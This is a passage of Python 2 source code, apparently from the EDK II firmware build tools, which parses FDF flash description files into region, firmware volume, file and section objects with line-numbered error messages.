# @param self The object pointer
# @param Obj for whom set statement is got
# @retval True Successfully find
# @retval False Not able to find
#
def __GetSetStatements(self, Obj):
while self.__GetSetStatement(Obj):
pass
## __GetSetStatement() method
#
# Get set statement
#
# @param self The object pointer
# @param Obj for whom set statement is got
# @retval True Successfully find
# @retval False Not able to find
#
def __GetSetStatement(self, Obj):
if self.__IsKeyword("SET"):
PcdPair = self.__GetNextPcdName()
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected value At Line ", self.FileName, self.CurrentLineNumber)
Value = self.__Token
if Value.startswith("{"):
# deal with value with {}
if not self.__SkipToToken( "}"):
raise Warning("expected '}' At Line ", self.FileName, self.CurrentLineNumber)
Value += self.__SkippedChars
Obj.SetVarDict[PcdPair] = Value
self.Profile.PcdDict[PcdPair] = Value
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
self.Profile.PcdFileLineDict[PcdPair] = FileLineTuple
return True
return False
## __GetRegionLayout() method
#
# Get region layout for FD
#
# @param self The object pointer
# @param Fd for whom region is got
# @retval True Successfully find
# @retval False Not able to find
#
def __GetRegionLayout(self, Fd):
if not self.__GetNextHexNumber():
return False
RegionObj = CommonDataClass.FdfClass.RegionClassObject()
RegionObj.Offset = long(self.__Token, 0)
Fd.RegionList.append(RegionObj)
if not self.__IsToken( "|"):
raise Warning("expected '|' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextHexNumber():
raise Warning("expected Region Size At Line ", self.FileName, self.CurrentLineNumber)
RegionObj.Size = long(self.__Token, 0)
if not self.__GetNextWord():
return True
if not self.__Token in ("SET", "FV", "FILE", "DATA", "CAPSULE"):
self.__UndoToken()
RegionObj.PcdOffset = self.__GetNextPcdName()
self.Profile.PcdDict[RegionObj.PcdOffset] = RegionObj.Offset + long(Fd.BaseAddress, 0)
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
self.Profile.PcdFileLineDict[RegionObj.PcdOffset] = FileLineTuple
if self.__IsToken( "|"):
RegionObj.PcdSize = self.__GetNextPcdName()
self.Profile.PcdDict[RegionObj.PcdSize] = RegionObj.Size
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
self.Profile.PcdFileLineDict[RegionObj.PcdSize] = FileLineTuple
if not self.__GetNextWord():
return True
if self.__Token == "SET":
self.__UndoToken()
self.__GetSetStatements( RegionObj)
if not self.__GetNextWord():
return True
elif self.__Token == "FV":
self.__UndoToken()
self.__GetRegionFvType( RegionObj)
elif self.__Token == "CAPSULE":
self.__UndoToken()
self.__GetRegionCapType( RegionObj)
elif self.__Token == "FILE":
self.__UndoToken()
self.__GetRegionFileType( RegionObj)
else:
self.__UndoToken()
self.__GetRegionDataType( RegionObj)
return True
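    # Illustrative sketch only -- a hypothetical region entry in the shape this method accepts:
    #   0x000000|0x040000
    #   gMyTokenSpaceGuid.PcdFvMainBase|gMyTokenSpaceGuid.PcdFvMainSize
    #   FV = FVMAIN
    # i.e. offset|size, an optional PCD pair that receives them, optional SET statements,
    # then FV / FILE / DATA / CAPSULE region data.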
## __GetRegionFvType() method
#
# Get region fv data for region
#
# @param self The object pointer
# @param RegionObj for whom region data is got
#
def __GetRegionFvType(self, RegionObj):
if not self.__IsKeyword( "FV"):
raise Warning("expected Keyword 'FV' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected FV name At Line ", self.FileName, self.CurrentLineNumber)
RegionObj.RegionType = "FV"
RegionObj.RegionDataList.append(self.__Token)
while self.__IsKeyword( "FV"):
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected FV name At Line ", self.FileName, self.CurrentLineNumber)
RegionObj.RegionDataList.append(self.__Token)
## __GetRegionCapType() method
#
# Get region capsule data for region
#
# @param self The object pointer
# @param RegionObj for whom region data is got
#
def __GetRegionCapType(self, RegionObj):
if not self.__IsKeyword("CAPSULE"):
raise Warning("expected Keyword 'CAPSULE' at line", self.FileName, self.CurrentLineNumber)
if not self.__IsToken("="):
raise Warning("expected '=' at line", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected CAPSULE name at line", self.FileName, self.CurrentLineNumber)
RegionObj.RegionType = "CAPSULE"
RegionObj.RegionDataList.append(self.__Token)
while self.__IsKeyword("CAPSULE"):
if not self.__IsToken("="):
raise Warning("expected '=' at line", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected CAPSULE name at line", self.FileName, self.CurrentLineNumber)
RegionObj.RegionDataList.append(self.__Token)
## __GetRegionFileType() method
#
# Get region file data for region
#
# @param self The object pointer
# @param RegionObj for whom region data is got
#
def __GetRegionFileType(self, RegionObj):
if not self.__IsKeyword( "FILE"):
raise Warning("expected Keyword 'FILE' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected File name At Line ", self.FileName, self.CurrentLineNumber)
RegionObj.RegionType = "FILE"
RegionObj.RegionDataList.append( self.__Token)
while self.__IsKeyword( "FILE"):
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected FILE name At Line ", self.FileName, self.CurrentLineNumber)
RegionObj.RegionDataList.append(self.__Token)
## __GetRegionDataType() method
#
# Get region array data for region
#
# @param self The object pointer
# @param RegionObj for whom region data is got
#
def __GetRegionDataType(self, RegionObj):
if not self.__IsKeyword( "DATA"):
raise Warning("expected Region Data type At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken( "{"):
raise Warning("expected '{' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextHexNumber():
raise Warning("expected Hex byte At Line ", self.FileName, self.CurrentLineNumber)
if len(self.__Token) > 18:
raise Warning("Hex string can't be converted to a valid UINT64 value", self.FileName, self.CurrentLineNumber)
DataString = self.__Token
DataString += ","
while self.__IsToken(","):
if not self.__GetNextHexNumber():
raise Warning("Invalid Hex number At Line ", self.FileName, self.CurrentLineNumber)
if len(self.__Token) > 4:
raise Warning("Hex byte(must be 2 digits) too long At Line ", self.FileName, self.CurrentLineNumber)
DataString += self.__Token
DataString += ","
if not self.__IsToken( "}"):
raise Warning("expected '}' At Line ", self.FileName, self.CurrentLineNumber)
DataString = DataString.rstrip(",")
RegionObj.RegionType = "DATA"
RegionObj.RegionDataList.append( DataString)
while self.__IsKeyword( "DATA"):
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken( "{"):
raise Warning("expected '{' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextHexNumber():
raise Warning("expected Hex byte At Line ", self.FileName, self.CurrentLineNumber)
if len(self.__Token) > 18:
raise Warning("Hex string can't be converted to a valid UINT64 value", self.FileName, self.CurrentLineNumber)
DataString = self.__Token
DataString += ","
while self.__IsToken(","):
self.__GetNextHexNumber()
if len(self.__Token) > 4:
raise Warning("Hex byte(must be 2 digits) too long At Line ", self.FileName, self.CurrentLineNumber)
DataString += self.__Token
DataString += ","
if not self.__IsToken( "}"):
raise Warning("expected '}' At Line ", self.FileName, self.CurrentLineNumber)
DataString = DataString.rstrip(",")
RegionObj.RegionDataList.append( DataString)
## __GetFv() method
#
# Get FV section contents and store its data into FV dictionary of self.Profile
#
# @param self The object pointer
# @retval True Successfully find a FV
# @retval False Not able to find a FV
#
def __GetFv(self):
if not self.__GetNextToken():
return False
S = self.__Token.upper()
if S.startswith("[") and not S.startswith("[FV."):
if not S.startswith("[CAPSULE.") \
and not S.startswith("[VTF.") and not S.startswith("[RULE."):
raise Warning("Unknown section or section appear sequence error \n(The correct sequence should be [FD.], [FV.], [Capsule.], [VTF.], [Rule.]) At Line ", self.FileName, self.CurrentLineNumber)
self.__UndoToken()
return False
self.__UndoToken()
if not self.__IsToken("[FV.", True):
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
print 'Parsing String: %s in File %s, At line: %d, Offset Within Line: %d' \
% (self.Profile.FileLinesList[self.CurrentLineNumber - 1][self.CurrentOffsetWithinLine :], FileLineTuple[0], FileLineTuple[1], self.CurrentOffsetWithinLine)
raise Warning("Unknown Keyword At Line ", self.FileName, self.CurrentLineNumber)
FvName = self.__GetUiName()
self.CurrentFvName = FvName.upper()
if not self.__IsToken( "]"):
raise Warning("expected ']' At Line ", self.FileName, self.CurrentLineNumber)
FvObj = CommonDataClass.FdfClass.FvClassObject()
FvObj.UiFvName = self.CurrentFvName
self.Profile.FvDict[self.CurrentFvName] = FvObj
Status = self.__GetCreateFile(FvObj)
if not Status:
raise Warning("FV name error At Line ", self.FileName, self.CurrentLineNumber)
self.__GetDefineStatements(FvObj)
self.__GetAddressStatements(FvObj)
self.__GetBlockStatement(FvObj)
self.__GetSetStatements(FvObj)
self.__GetFvAlignment(FvObj)
self.__GetFvAttributes(FvObj)
self.__GetFvNameGuid(FvObj)
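        # The same call appears twice on purpose: an FV may carry both a PEI and a DXE
        # APRIORI section, so up to two of them are parsed here.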
self.__GetAprioriSection(FvObj, FvObj.DefineVarDict.copy())
self.__GetAprioriSection(FvObj, FvObj.DefineVarDict.copy())
while True:
isInf = self.__GetInfStatement(FvObj, MacroDict = FvObj.DefineVarDict.copy())
isFile = self.__GetFileStatement(FvObj, MacroDict = FvObj.DefineVarDict.copy())
if not isInf and not isFile:
break
return True
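    # Illustrative sketch only -- a hypothetical [FV.] section in the shape this method accepts:
    #
    #   [FV.FVMAIN]
    #   FvAlignment    = 16
    #   ERASE_POLARITY = 1
    #   MEMORY_MAPPED  = TRUE
    #   INF MdeModulePkg/Core/Dxe/DxeMain.inf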
## __GetFvAlignment() method
#
# Get alignment for FV
#
# @param self The object pointer
# @param Obj for whom alignment is got
# @retval True Successfully find a alignment statement
# @retval False Not able to find a alignment statement
#
def __GetFvAlignment(self, Obj):
if not self.__IsKeyword( "FvAlignment"):
return False
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected alignment value At Line ", self.FileName, self.CurrentLineNumber)
if self.__Token.upper() not in ("1", "2", "4", "8", "16", "32", "64", "128", "256", "512", \
"1K", "2K", "4K", "8K", "16K", "32K", "64K", "128K", "256K", "512K", \
"1M", "2M", "4M", "8M", "16M", "32M", "64M", "128M", "256M", "512M", \
"1G", "2G"):
raise Warning("Unknown alignment value At Line ", self.FileName, self.CurrentLineNumber)
Obj.FvAlignment = self.__Token
return True
## __GetFvAttributes() method
#
# Get attributes for FV
#
# @param self The object pointer
# @param Obj for whom attribute is got
# @retval None
#
def __GetFvAttributes(self, FvObj):
while self.__GetNextWord():
name = self.__Token
if name not in ("ERASE_POLARITY", "MEMORY_MAPPED", \
"STICKY_WRITE", "LOCK_CAP", "LOCK_STATUS", "WRITE_ENABLED_CAP", \
"WRITE_DISABLED_CAP", "WRITE_STATUS", "READ_ENABLED_CAP", \
"READ_DISABLED_CAP", "READ_STATUS", "READ_LOCK_CAP", \
"READ_LOCK_STATUS", "WRITE_LOCK_CAP", "WRITE_LOCK_STATUS", \
"WRITE_POLICY_RELIABLE"):
self.__UndoToken()
return
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken() or self.__Token.upper() not in ("TRUE", "FALSE", "1", "0"):
raise Warning("expected TRUE/FALSE (1/0) At Line ", self.FileName, self.CurrentLineNumber)
FvObj.FvAttributeDict[name] = self.__Token
return
## __GetFvNameGuid() method
#
# Get FV GUID for FV
#
# @param self The object pointer
# @param Obj for whom GUID is got
# @retval None
#
def __GetFvNameGuid(self, FvObj):
if not self.__IsKeyword( "FvNameGuid"):
return
if not self.__IsToken( "="):
raise Warning("expected '='", self.FileName, self.CurrentLineNumber)
if not self.__GetNextGuid():
raise Warning("expected FV GUID value", self.FileName, self.CurrentLineNumber)
FvObj.FvNameGuid = self.__Token
return
## __GetAprioriSection() method
#
# Get token statements
#
# @param self The object pointer
# @param FvObj for whom apriori is got
# @param MacroDict dictionary used to replace macro
# @retval True Successfully find apriori statement
# @retval False Not able to find apriori statement
#
def __GetAprioriSection(self, FvObj, MacroDict = {}):
if not self.__IsKeyword( "APRIORI"):
return False
if not self.__IsKeyword("PEI") and not self.__IsKeyword("DXE"):
raise Warning("expected Apriori file type At Line ", self.FileName, self.CurrentLineNumber)
AprType = self.__Token
if not self.__IsToken( "{"):
raise Warning("expected '{' At Line ", self.FileName, self.CurrentLineNumber)
AprSectionObj = CommonDataClass.FdfClass.AprioriSectionClassObject()
AprSectionObj.AprioriType = AprType
self.__GetDefineStatements(AprSectionObj)
MacroDict.update(AprSectionObj.DefineVarDict)
while True:
IsInf = self.__GetInfStatement( AprSectionObj, MacroDict = MacroDict)
IsFile = self.__GetFileStatement( AprSectionObj)
if not IsInf and not IsFile:
break
if not self.__IsToken( "}"):
raise Warning("expected '}' At Line ", self.FileName, self.CurrentLineNumber)
FvObj.AprioriSectionList.append(AprSectionObj)
return True
## __GetInfStatement() method
#
# Get INF statements
#
# @param self The object pointer
# @param Obj for whom inf statement is got
# @param MacroDict dictionary used to replace macro
# @retval True Successfully find inf statement
# @retval False Not able to find inf statement
#
def __GetInfStatement(self, Obj, ForCapsule = False, MacroDict = {}):
if not self.__IsKeyword( "INF"):
return False
ffsInf = CommonDataClass.FdfClass.FfsInfStatementClassObject()
self.__GetInfOptions( ffsInf)
if not self.__GetNextToken():
raise Warning("expected INF file path At Line ", self.FileName, self.CurrentLineNumber)
ffsInf.InfFileName = self.__Token
# if ffsInf.InfFileName.find('$') >= 0:
# ffsInf.InfFileName = GenFdsGlobalVariable.GenFdsGlobalVariable.MacroExtend(ffsInf.InfFileName, MacroDict)
if not ffsInf.InfFileName in self.Profile.InfList:
self.Profile.InfList.append(ffsInf.InfFileName)
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
self.Profile.InfFileLineList.append(FileLineTuple)
if self.__IsToken('|'):
if self.__IsKeyword('RELOCS_STRIPPED'):
ffsInf.KeepReloc = False
elif self.__IsKeyword('RELOCS_RETAINED'):
ffsInf.KeepReloc = True
else:
raise Warning("Unknown reloc strip flag At Line ", self.FileName, self.CurrentLineNumber)
if ForCapsule:
capsuleFfs = CapsuleData.CapsuleFfs()
capsuleFfs.Ffs = ffsInf
Obj.CapsuleDataList.append(capsuleFfs)
else:
Obj.FfsList.append(ffsInf)
return True
## __GetInfOptions() method
#
# Get options for INF
#
# @param self The object pointer
# @param FfsInfObj for whom option is got
#
def __GetInfOptions(self, FfsInfObj):
if self.__IsKeyword( "RuleOverride"):
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected Rule name At Line ", self.FileName, self.CurrentLineNumber)
FfsInfObj.Rule = self.__Token
if self.__IsKeyword( "VERSION"):
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected Version At Line ", self.FileName, self.CurrentLineNumber)
if self.__GetStringData():
FfsInfObj.Version = self.__Token
if self.__IsKeyword( "UI"):
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected UI name At Line ", self.FileName, self.CurrentLineNumber)
if self.__GetStringData():
FfsInfObj.Ui = self.__Token
if self.__IsKeyword( "USE"):
if not self.__IsToken( "="):
raise Warning("expected '='", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected ARCH name", self.FileName, self.CurrentLineNumber)
FfsInfObj.UseArch = self.__Token
if self.__GetNextToken():
p = re.compile(r'([a-zA-Z0-9\-]+|\$\(TARGET\)|\*)_([a-zA-Z0-9\-]+|\$\(TOOL_CHAIN_TAG\)|\*)_([a-zA-Z0-9\-]+|\$\(ARCH\)|\*)')
if p.match(self.__Token):
FfsInfObj.KeyStringList.append(self.__Token)
if not self.__IsToken(","):
return
else:
self.__UndoToken()
return
while self.__GetNextToken():
if not p.match(self.__Token):
raise Warning("expected KeyString \"Target_Tag_Arch\" At Line ", self.FileName, self.CurrentLineNumber)
FfsInfObj.KeyStringList.append(self.__Token)
if not self.__IsToken(","):
break
## __GetFileStatement() method
#
# Get FILE statements
#
# @param self The object pointer
# @param Obj for whom FILE statement is got
# @param MacroDict dictionary used to replace macro
# @retval True Successfully find FILE statement
# @retval False Not able to find FILE statement
#
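# Illustrative FILE statement of the kind this method accepts (the GUID and the
# file name are placeholders):
#   FILE DRIVER = 11111111-2222-3333-4444-555555555555 {
#     SECTION PE32 = SampleDriver.efi
#   }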
def __GetFileStatement(self, Obj, ForCapsule = False, MacroDict = {}):
if not self.__IsKeyword( "FILE"):
return False
FfsFileObj = CommonDataClass.FdfClass.FileStatementClassObject()
if not self.__GetNextWord():
raise Warning("expected FFS type At Line ", self.FileName, self.CurrentLineNumber)
FfsFileObj.FvFileType = self.__Token
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextGuid():
if not self.__GetNextWord():
raise Warning("expected File GUID", self.FileName, self.CurrentLineNumber)
if self.__Token == 'PCD':
if not self.__IsToken( "("):
raise Warning("expected '('", self.FileName, self.CurrentLineNumber)
PcdPair = self.__GetNextPcdName()
if not self.__IsToken( ")"):
raise Warning("expected ')'", self.FileName, self.CurrentLineNumber)
self.__Token = 'PCD('+PcdPair[1]+'.'+PcdPair[0]+')'
FfsFileObj.NameGuid = self.__Token
self.__GetFilePart( FfsFileObj, MacroDict.copy())
if ForCapsule:
capsuleFfs = CapsuleData.CapsuleFfs()
capsuleFfs.Ffs = FfsFileObj
Obj.CapsuleDataList.append(capsuleFfs)
else:
Obj.FfsList.append(FfsFileObj)
return True
## __FileCouldHaveRelocFlag() method
#
# Check whether reloc strip flag can be set for a file type.
#
# @param self The object pointer
# @param FileType The file type to check with
# @retval True This type could have relocation strip flag
# @retval False No way to have it
#
def __FileCouldHaveRelocFlag (self, FileType):
if FileType in ('SEC', 'PEI_CORE', 'PEIM', 'PEI_DXE_COMBO'):
return True
else:
return False
## __SectionCouldHaveRelocFlag() method
#
# Check whether reloc strip flag can be set for a section type.
#
# @param self The object pointer
# @param SectionType The section type to check with
# @retval True This type could have relocation strip flag
# @retval False No way to have it
#
def __SectionCouldHaveRelocFlag (self, SectionType):
if SectionType in ('TE', 'PE32'):
return True
else:
return False
## __GetFilePart() method
#
# Get components for FILE statement
#
# @param self The object pointer
# @param FfsFileObj for whom component is got
# @param MacroDict dictionary used to replace macro
#
def __GetFilePart(self, FfsFileObj, MacroDict = {}):
self.__GetFileOpts( FfsFileObj)
if not self.__IsToken("{"):
# if self.__IsKeyword('RELOCS_STRIPPED') or self.__IsKeyword('RELOCS_RETAINED'):
# if self.__FileCouldHaveRelocFlag(FfsFileObj.FvFileType):
# if self.__Token == 'RELOCS_STRIPPED':
# FfsFileObj.KeepReloc = False
# else:
# FfsFileObj.KeepReloc = True
# else:
# raise Warning("File type %s could not have reloc strip flag At Line %d" % (FfsFileObj.FvFileType, self.CurrentLineNumber), self.FileName, self.CurrentLineNumber)
#
# if not self.__IsToken("{"):
raise Warning("expected '{' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected File name or section data At Line ", self.FileName, self.CurrentLineNumber)
if self.__Token == "FV":
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected FV name At Line ", self.FileName, self.CurrentLineNumber)
FfsFileObj.FvName = self.__Token
elif self.__Token == "FD":
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected FD name At Line ", self.FileName, self.CurrentLineNumber)
FfsFileObj.FdName = self.__Token
elif self.__Token in ("DEFINE", "APRIORI", "SECTION"):
self.__UndoToken()
self.__GetSectionData( FfsFileObj, MacroDict)
else:
FfsFileObj.FileName = self.__Token
if not self.__IsToken( "}"):
raise Warning("expected '}' At Line ", self.FileName, self.CurrentLineNumber)
## __GetFileOpts() method
#
# Get options for FILE statement
#
# @param self The object pointer
# @param FfsFileObj for whom options is got
#
def __GetFileOpts(self, FfsFileObj):
if self.__GetNextToken():
Pattern = re.compile(r'([a-zA-Z0-9\-]+|\$\(TARGET\)|\*)_([a-zA-Z0-9\-]+|\$\(TOOL_CHAIN_TAG\)|\*)_([a-zA-Z0-9\-]+|\$\(ARCH\)|\*)')
if Pattern.match(self.__Token):
FfsFileObj.KeyStringList.append(self.__Token)
if self.__IsToken(","):
while self.__GetNextToken():
if not Pattern.match(self.__Token):
raise Warning("expected KeyString \"Target_Tag_Arch\" At Line ", self.FileName, self.CurrentLineNumber)
FfsFileObj.KeyStringList.append(self.__Token)
if not self.__IsToken(","):
break
else:
self.__UndoToken()
if self.__IsKeyword( "FIXED", True):
FfsFileObj.Fixed = True
if self.__IsKeyword( "CHECKSUM", True):
FfsFileObj.CheckSum = True
if self.__GetAlignment():
FfsFileObj.Alignment = self.__Token
## __GetAlignment() method
#
# Return the alignment value
#
# @param self The object pointer
# @retval True Successfully find alignment
# @retval False Not able to find alignment
#
def __GetAlignment(self):
if self.__IsKeyword( "Align", True):
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected alignment value At Line ", self.FileName, self.CurrentLineNumber)
return True
return False
## __GetSectionData() method
#
# Get section data for FILE statement
#
# @param self The object pointer
# @param FfsFileObj for whom section is got
# @param MacroDict dictionary used to replace macro
#
def __GetSectionData(self, FfsFileObj, MacroDict = {}):
Dict = {}
Dict.update(MacroDict)
self.__GetDefineStatements(FfsFileObj)
Dict.update(FfsFileObj.DefineVarDict)
self.__GetAprioriSection(FfsFileObj, Dict.copy())
self.__GetAprioriSection(FfsFileObj, Dict.copy())
while True:
IsLeafSection = self.__GetLeafSection(FfsFileObj, Dict)
IsEncapSection = self.__GetEncapsulationSec(FfsFileObj)
if not IsLeafSection and not IsEncapSection:
break
## __GetLeafSection() method
#
# Get leaf section for Obj
#
# @param self The object pointer
# @param Obj for whom leaf section is got
# @param MacroDict dictionary used to replace macro
# @retval True Successfully find section statement
# @retval False Not able to find section statement
#
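# Illustrative leaf SECTION statements of the kind this method accepts (names
# and file paths are placeholders):
#   SECTION UI = "SampleDriver"
#   SECTION Align = 32 PE32 = SampleDriver.efi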
def __GetLeafSection(self, Obj, MacroDict = {}):
OldPos = self.GetFileBufferPos()
if not self.__IsKeyword( "SECTION"):
if len(Obj.SectionList) == 0:
raise Warning("expected SECTION At Line ", self.FileName, self.CurrentLineNumber)
else:
return False
AlignValue = None
if self.__GetAlignment():
if self.__Token not in ("Auto", "8", "16", "32", "64", "128", "512", "1K", "4K", "32K" ,"64K"):
raise Warning("Incorrect alignment '%s'" % self.__Token, self.FileName, self.CurrentLineNumber)
AlignValue = self.__Token
BuildNum = None
if self.__IsKeyword( "BUILD_NUM"):
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected Build number value At Line ", self.FileName, self.CurrentLineNumber)
BuildNum = self.__Token
if self.__IsKeyword( "VERSION"):
if AlignValue == 'Auto':
raise Warning("Auto alignment can only be used in PE32 or TE section ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected version At Line ", self.FileName, self.CurrentLineNumber)
VerSectionObj = CommonDataClass.FdfClass.VerSectionClassObject()
VerSectionObj.Alignment = AlignValue
VerSectionObj.BuildNum = BuildNum
if self.__GetStringData():
VerSectionObj.StringData = self.__Token
else:
VerSectionObj.FileName = self.__Token
Obj.SectionList.append(VerSectionObj)
elif self.__IsKeyword( "UI"):
if AlignValue == 'Auto':
raise Warning("Auto alignment can only be used in PE32 or TE section ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected UI At Line ", self.FileName, self.CurrentLineNumber)
UiSectionObj = CommonDataClass.FdfClass.UiSectionClassObject()
UiSectionObj.Alignment = AlignValue
if self.__GetStringData():
UiSectionObj.StringData = self.__Token
else:
UiSectionObj.FileName = self.__Token
Obj.SectionList.append(UiSectionObj)
elif self.__IsKeyword( "FV_IMAGE"):
if AlignValue == 'Auto':
raise Warning("Auto alignment can only be used in PE32 or TE section ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextWord():
raise Warning("expected FV name At Line ", self.FileName, self.CurrentLineNumber)
FvName = self.__Token.upper()
FvObj = None
if self.__IsToken( "{"):
FvObj = Fv.FV()
FvObj.UiFvName = FvName
self.__GetDefineStatements(FvObj)
MacroDict.update(FvObj.DefineVarDict)
self.__GetBlockStatement(FvObj)
self.__GetSetStatements(FvObj)
self.__GetFvAlignment(FvObj)
self.__GetFvAttributes(FvObj)
self.__GetAprioriSection(FvObj, MacroDict.copy())
self.__GetAprioriSection(FvObj, MacroDict.copy())
while True:
IsInf = self.__GetInfStatement(FvObj, MacroDict = MacroDict.copy())
IsFile = self.__GetFileStatement(FvObj, MacroDict = MacroDict.copy())
if not IsInf and not IsFile:
break
if not self.__IsToken( "}"):
raise Warning("expected '}' At Line ", self.FileName, self.CurrentLineNumber)
FvImageSectionObj = CommonDataClass.FdfClass.FvImageSectionClassObject()
FvImageSectionObj.Alignment = AlignValue
if FvObj != None:
FvImageSectionObj.Fv = FvObj
FvImageSectionObj.FvName = None
else:
FvImageSectionObj.FvName = FvName
Obj.SectionList.append(FvImageSectionObj)
elif self.__IsKeyword("PEI_DEPEX_EXP") or self.__IsKeyword("DXE_DEPEX_EXP") or self.__IsKeyword("SMM_DEPEX_EXP"):
if AlignValue == 'Auto':
raise Warning("Auto alignment can only be used in PE32 or TE section ", self.FileName, self.CurrentLineNumber)
DepexSectionObj = CommonDataClass.FdfClass.DepexSectionClassObject()
DepexSectionObj.Alignment = AlignValue
DepexSectionObj.DepexType = self.__Token
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken( "{"):
raise Warning("expected '{' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__SkipToToken( "}"):
raise Warning("expected Depex expression ending '}' At Line ", self.FileName, self.CurrentLineNumber)
DepexSectionObj.Expression = self.__SkippedChars.rstrip('}')
Obj.SectionList.append(DepexSectionObj)
else:
if not self.__GetNextWord():
raise Warning("expected section type At Line ", self.FileName, self.CurrentLineNumber)
# An encapsulation section appears here; undo the token and return
if self.__Token == "COMPRESS" or self.__Token == "GUIDED":
self.SetFileBufferPos(OldPos)
return False
if self.__Token not in ("COMPAT16", "PE32", "PIC", "TE", "FV_IMAGE", "RAW", "DXE_DEPEX",\
"UI", "VERSION", "PEI_DEPEX", "SUBTYPE_GUID", "SMM_DEPEX"):
raise Warning("Unknown section type '%s'" % self.__Token, self.FileName, self.CurrentLineNumber)
if AlignValue == 'Auto' and (not self.__Token == 'PE32') and (not self.__Token == 'TE'):
raise Warning("Auto alignment can only be used in PE32 or TE section ", self.FileName, self.CurrentLineNumber)
# DataSection
DataSectionObj = CommonDataClass.FdfClass.DataSectionClassObject()
DataSectionObj.Alignment = AlignValue
DataSectionObj.SecType = self.__Token
if self.__IsKeyword('RELOCS_STRIPPED') or self.__IsKeyword('RELOCS_RETAINED'):
if self.__FileCouldHaveRelocFlag(Obj.FvFileType) and self.__SectionCouldHaveRelocFlag(DataSectionObj.SecType):
if self.__Token == 'RELOCS_STRIPPED':
DataSectionObj.KeepReloc = False
else:
DataSectionObj.KeepReloc = True
else:
raise Warning("File type %s, section type %s, could not have reloc strip flag At Line %d" % (Obj.FvFileType, DataSectionObj.SecType, self.CurrentLineNumber), self.FileName, self.CurrentLineNumber)
if self.__IsToken("="):
if not self.__GetNextToken():
raise Warning("expected section file path At Line ", self.FileName, self.CurrentLineNumber)
DataSectionObj.SectFileName = self.__Token
else:
if not self.__GetCglSection(DataSectionObj):
return False
Obj.SectionList.append(DataSectionObj)
return True
## __GetCglSection() method
#
# Get compressed or GUIDed section for Obj
#
# @param self The object pointer
# @param Obj for whom leaf section is got
# @param AlignValue alignment value for complex section
# @retval True Successfully find section statement
# @retval False Not able to find section statement
#
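# Illustrative encapsulation bodies of the kind this method accepts (the
# enclosing 'SECTION' keyword is consumed by the caller; the GUID and file
# names are placeholders):
#   COMPRESS PI_STD {
#     SECTION PE32 = SampleDriver.efi
#   }
#   GUIDED 11111111-2222-3333-4444-555555555555 PROCESSING_REQUIRED = TRUE {
#     SECTION RAW = SampleData.bin
#   }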
def __GetCglSection(self, Obj, AlignValue = None):
if self.__IsKeyword( "COMPRESS"):
type = "PI_STD"
if self.__IsKeyword("PI_STD") or self.__IsKeyword("PI_NONE"):
type = self.__Token
if not self.__IsToken("{"):
raise Warning("expected '{' At Line ", self.FileName, self.CurrentLineNumber)
CompressSectionObj = CommonDataClass.FdfClass.CompressSectionClassObject()
